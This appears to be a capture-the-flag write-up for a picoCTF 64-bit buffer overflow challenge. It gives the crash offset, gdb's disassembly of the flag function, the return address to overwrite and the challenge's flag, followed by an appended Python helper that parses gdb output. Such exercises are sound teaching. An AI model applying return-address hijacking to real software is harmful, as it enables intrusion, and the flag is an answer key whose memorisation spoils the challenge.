Sanjay C / LT 'syreal' Jones
Overflow x64 code
Most problems before this are 32-bit x86. Now we'll consider 64-bit x86, which is a little different! Overflow the buffer and change the return address to the flag function in this program.
Download source.
nc saturn.picoctf.net 65512
- Now that we're in 64-bit, what used to be 4 bytes may now be 8 bytes.
- Jump to the second instruction (the one after the first push) in the flag function if you're getting mysterious segmentation faults.
First I ran the binary with inputs of different lengths to find how many characters I could send before it gave a segmentation fault. That number was 72.
Next we'll take a look at where the flag function is located. To do this, install GDB and run gdb vuln. Once in GDB:
(gdb) disassemble flag
Dump of assembler code for function flag:
0x0000000000401236 <+0>: endbr64
0x000000000040123a <+4>: push %rbp
0x000000000040123b <+5>: mov %rsp,%rbp
0x000000000040123e <+8>: sub $0x50,%rsp
0x0000000000401242 <+12>: lea 0xdbf(%rip),%rsi # 0x402008
0x0000000000401249 <+19>: lea 0xdba(%rip),%rdi # 0x40200a
0x0000000000401250 <+26>: call 0x401130 <fopen@plt>
0x0000000000401255 <+31>: mov %rax,-0x8(%rbp)
0x0000000000401259 <+35>: cmpq $0x0,-0x8(%rbp)
0x000000000040125e <+40>: jne 0x401289 <flag+83>
0x0000000000401260 <+42>: lea 0xdac(%rip),%rdx # 0x402013
0x0000000000401267 <+49>: lea 0xdba(%rip),%rsi # 0x402028
0x000000000040126e <+56>: lea 0xde8(%rip),%rdi # 0x40205d
0x0000000000401275 <+63>: mov $0x0,%eax
0x000000000040127a <+68>: call 0x4010e0 <printf@plt>
0x000000000040127f <+73>: mov $0x0,%edi
0x0000000000401284 <+78>: call 0x401140 <exit@plt>
0x0000000000401289 <+83>: mov -0x8(%rbp),%rdx
0x000000000040128d <+87>: lea -0x50(%rbp),%rax
0x0000000000401291 <+91>: mov $0x40,%esi
0x0000000000401296 <+96>: mov %rax,%rdi
0x0000000000401299 <+99>: call 0x4010f0 <fgets@plt>
0x000000000040129e <+104>: lea -0x50(%rbp),%rax
0x00000000004012a2 <+108>: mov %rax,%rdi
0x00000000004012a5 <+111>: mov $0x0,%eax
0x00000000004012aa <+116>: call 0x4010e0 <printf@plt>
0x00000000004012af <+121>: nop
0x00000000004012b0 <+122>: leave
0x00000000004012b1 <+123>: ret
End of assembler dump.
We can see the flag function starts at 0x0000000000401236, but the second hint says to use the second instruction, 0x000000000040123b <+5>: mov %rsp,%rbp, so the address we want is 0x000000000040123b. From there, we can write the script, which was 100% necessary. Running the script will get you the flag.
picoCTF{b1663r_15_b3773r_011d4bd8}
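To make reading the dump above mechanical, here is an added Python helper (my own, not the author's script) that parses a gdb "disassemble" dump and returns the function's start address and the address of the instruction after the first push, as the second hint describes. The embedded dump is a verbatim excerpt of the one shown above.

```python
import re

# Verbatim excerpt of the "disassemble flag" output quoted in the writeup.
GDB_DUMP = """\
Dump of assembler code for function flag:
0x0000000000401236 <+0>: endbr64
0x000000000040123a <+4>: push %rbp
0x000000000040123b <+5>: mov %rsp,%rbp
0x000000000040123e <+8>: sub $0x50,%rsp
0x00000000004012b0 <+122>: leave
0x00000000004012b1 <+123>: ret
End of assembler dump.
"""

# One gdb line: optional "=>" marker, address, <+offset>:, mnemonic, operands.
LINE_RE = re.compile(
    r"^\s*(?:=>\s*)?(0x[0-9a-fA-F]+)\s+<\+(\d+)>:\s+(\S+)(?:\s+(.*))?$"
)


def parse_disassembly(dump):
    """Return a list of (address, offset, mnemonic, operands) tuples."""
    insns = []
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if m:
            addr, off, mnem, ops = m.groups()
            insns.append((int(addr, 16), int(off), mnem, ops or ""))
    return insns


def function_start(insns):
    """Address of the first instruction (what 'disassemble' lists at <+0>)."""
    return insns[0][0]


def after_first_push(insns):
    """Address of the instruction following the first push (hint 2)."""
    for i, (_addr, _off, mnem, _ops) in enumerate(insns):
        if mnem == "push":
            return insns[i + 1][0]
    raise ValueError("no push instruction found")


def hex64(addr):
    """Format as a 64-bit address, matching gdb's 16-digit output (hint 1)."""
    return f"0x{addr:016x}"
```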